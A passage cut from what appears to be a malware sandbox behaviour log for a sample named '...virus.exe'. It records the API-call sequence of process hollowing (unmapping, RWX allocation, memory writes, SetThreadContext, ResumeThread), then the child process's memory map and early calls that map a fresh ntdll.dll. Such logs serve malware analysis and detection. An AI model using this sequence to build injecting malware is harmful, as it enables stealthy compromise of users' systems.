[411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0080.949] ReadProcessMemory (in: hProcess=0x7c, lpBaseAddress=0x7efde008, lpBuffer=0x18e35c, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x18e35c*, lpNumberOfBytesRead=0x0) returned 1 [0080.949] NtUnmapViewOfSection (ProcessHandle=0x7c, BaseAddress=0x400000) returned 0x0 [0080.952] VirtualAllocEx (hProcess=0x7c, lpAddress=0x400000, dwSize=0x9000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0080.953] NtWriteVirtualMemory (in: ProcessHandle=0x7c, BaseAddress=0x400000, Buffer=0x2215a0*, NumberOfBytesToWrite=0x200, NumberOfBytesWritten=0x0 | out: Buffer=0x2215a0*, NumberOfBytesWritten=0x0) returned 0x0 [0080.955] NtWriteVirtualMemory (in: ProcessHandle=0x7c, BaseAddress=0x401000, Buffer=0x2217a0*, NumberOfBytesToWrite=0x7200, NumberOfBytesWritten=0x0 | out: Buffer=0x2217a0*, NumberOfBytesWritten=0x0) returned 0x0 [0080.957] WriteProcessMemory (in: hProcess=0x7c, lpBaseAddress=0x7efde008, lpBuffer=0x221654*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x221654*, lpNumberOfBytesWritten=0x0) returned 1 [0080.958] SetThreadContext (hThread=0x78, lpContext=0x230000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x402f47, Ebp=0x0, Eip=0x779f01c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0080.958] ResumeThread (hThread=0x78) returned 0x1 [0080.959] CloseHandle (hObject=0x78) returned 1 [0080.959] CloseHandle (hObject=0x7c) returned 1 [0080.959] ExitProcess (uExitCode=0x0) [0080.959] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x2f07d0 | out: hHeap=0x2f0000) returned 1 Process: id = "2" image_name = "d609a21245d77dccd6d4a659cbd9466a.virus.exe" filename = "c:\\users\\keecfmwgj\\desktop\\d609a21245d77dccd6d4a659cbd9466a.virus.exe" page_root = "0x46b4e000" os_pid = "0xe88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xe5c" cmd_line = "\"C:\\Users\\kEecfMwgj\\Desktop\\d609a21245d77dccd6d4a659cbd9466a.virus.exe\" " cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 316 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 317 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 318 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 319 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 320 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 321 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 322 start_va = 0x400000 end_va = 0x44dfff monitored = 1 entry_point = 0x402ed7 region_type = mapped_file name = "d609a21245d77dccd6d4a659cbd9466a.virus.exe" filename = "\\Users\\kEecfMwgj\\Desktop\\d609a21245d77dccd6d4a659cbd9466a.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\d609a21245d77dccd6d4a659cbd9466a.virus.exe") Region: id = 323 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 324 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 325 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 326 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 327 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 328 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 329 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 330 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 331 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 332 start_va = 0x400000 end_va = 0x408fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 333 start_va = 0x1a0000 end_va = 0x21ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 334 start_va = 0x75250000 end_va = 0x75257fff monitored = 0 entry_point = 0x752520f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 335 start_va = 0x75260000 end_va = 0x752bbfff monitored = 0 entry_point = 0x7529f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 336 start_va = 0x752c0000 end_va = 0x752fefff monitored = 0 entry_point = 0x752ee088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 337 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 338 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 339 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 340 start_va = 0x776e0000 end_va = 0x777fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000776e0000" filename = "" Region: id = 341 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 342 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 343 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 344 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 345 start_va = 0x76fe0000 end_va = 0x77026fff monitored = 0 entry_point = 0x76fe74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 346 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 347 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 348 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 349 start_va = 0x220000 end_va = 0x286fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 350 start_va = 0x773b0000 end_va = 0x774affff monitored = 0 entry_point = 0x773cb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 351 start_va = 0x77240000 end_va = 0x772cffff monitored = 0 entry_point = 0x77256343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 352 start_va = 0x75780000 end_va = 0x75789fff monitored = 0 entry_point = 0x757836a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 353 start_va = 0x76ac0000 end_va = 0x76b5cfff monitored = 0 entry_point = 0x76af3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 354 start_va = 0x76cc0000 end_va = 0x76d6bfff monitored = 0 entry_point = 0x76cca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 355 start_va = 0x76c20000 end_va = 0x76cbffff monitored = 0 entry_point = 0x76c349e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 356 start_va = 0x76900000 end_va = 0x76918fff monitored = 0 entry_point = 0x76904975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 357 start_va = 0x75bc0000 end_va = 0x75caffff monitored = 0 entry_point = 0x75bd0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 358 start_va = 0x75530000 end_va = 0x7558ffff monitored = 0 entry_point = 0x7554a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 359 start_va = 0x75520000 end_va = 0x7552bfff monitored = 0 entry_point = 0x755210e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 360 start_va = 0x410000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 361 start_va = 0x290000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 362 start_va = 0x390000 end_va = 0x3adfff monitored = 0 entry_point = 0x3a158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 363 start_va = 0x410000 end_va = 0x597fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 364 start_va = 0x5b0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 365 start_va = 0x390000 end_va = 0x3adfff monitored = 0 entry_point = 0x3a158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 366 start_va = 0x76b90000 end_va = 0x76beffff monitored = 0 entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 367 start_va = 0x774b0000 end_va = 0x7757bfff monitored = 0 entry_point = 0x774b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 368 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 369 start_va = 0x390000 end_va = 0x390fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 370 start_va = 0x5c0000 end_va = 0x740fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 371 start_va = 0x750000 end_va = 0x1b4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 372 start_va = 0x75cb0000 end_va = 0x768f9fff monitored = 0 entry_point = 0x75d31601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 373 start_va = 0x771d0000 end_va = 0x77226fff monitored = 0 entry_point = 0x771e9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 374 start_va = 0x1b50000 end_va = 0x1ccffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 375 start_va = 0x3a0000 end_va = 0x3a5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 376 start_va = 0x3b0000 end_va = 0x3b4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 814 start_va = 0x3c0000 end_va = 0x3d5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Thread: id = 2 os_tid = 0xe8c [0081.227] RtlInitUnicodeString (in: DestinationString=0x18ff54, SourceString="kernel32" | out: DestinationString="kernel32") [0081.227] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="kernel32", BaseAddress=0x18ff5c | out: BaseAddress=0x18ff5c*=0x769b0000) returned 0x0 [0081.227] RtlInitUnicodeString (in: DestinationString=0x18ff54, SourceString="user32" | out: DestinationString="user32") [0081.227] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="user32", BaseAddress=0x18ff5c | out: BaseAddress=0x18ff5c*=0x773b0000) returned 0x0 [0081.294] RtlInitUnicodeString (in: DestinationString=0x18ff54, SourceString="advapi32" | out: DestinationString="advapi32") [0081.294] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="advapi32", BaseAddress=0x18ff5c | out: BaseAddress=0x18ff5c*=0x76c20000) returned 0x0 [0081.294] RtlInitUnicodeString (in: DestinationString=0x18ff54, SourceString="shell32" | out: DestinationString="shell32") [0081.294] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="shell32", BaseAddress=0x18ff5c | out: BaseAddress=0x18ff5c*=0x75cb0000) returned 0x0 [0084.705] GetKeyboardLayoutList (in: nBuff=0, lpList=0x0 | out: lpList=0x0) returned 1 [0084.705] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x290a50 [0084.705] GetKeyboardLayoutList (in: nBuff=1, lpList=0x290a50 | out: lpList=0x290a50) returned 1 [0084.706] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18fb14 | out: TokenHandle=0x18fb14*=0x74) returned 1 [0084.706] GetTokenInformation (in: TokenHandle=0x74, TokenInformationClass=0x19, TokenInformation=0x18fb18, TokenInformationLength=0x14, ReturnLength=0x18fb10 | out: TokenInformation=0x18fb18, ReturnLength=0x18fb10) returned 1 [0084.706] ExpandEnvironmentStringsW (in: lpSrc="%systemroot%\\system32\\ntdll.dll", lpDst=0x18fd54, nSize=0x104 | out: lpDst="C:\\Windows\\system32\\ntdll.dll") returned 0x1e [0084.706] CreateFileW (lpFileName="C:\\Windows\\system32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0084.776] CreateFileMappingW (hFile=0x78, lpFileMappingAttributes=0x0, flProtect=0x1000002, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x7c [0084.776] MapViewOfFile (hFileMappingObject=0x7c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, 